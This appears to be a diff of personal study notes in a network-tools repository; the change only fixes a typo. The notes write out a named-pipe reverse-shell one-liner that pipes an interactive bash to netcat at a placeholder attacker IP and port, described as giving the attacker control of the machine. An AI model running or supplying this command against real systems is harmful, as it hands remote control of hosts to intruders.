costalopes71/network-troubleshooting-tools/annotations.md

   creates a file that will be used as a pipe/socket for enabling the attacked system to offer a shell

 cat /tmp/<file_created_above> | /bin/bash -i 2>&1 | nc <attacker-ip> <port-number> > /tmp/<file-created-above>
-  connects to the attacker machine e offers a shell for the attacker to control the attacked machine
+  connects to the attacker machine and offers a shell for the attacker to control the attacked machine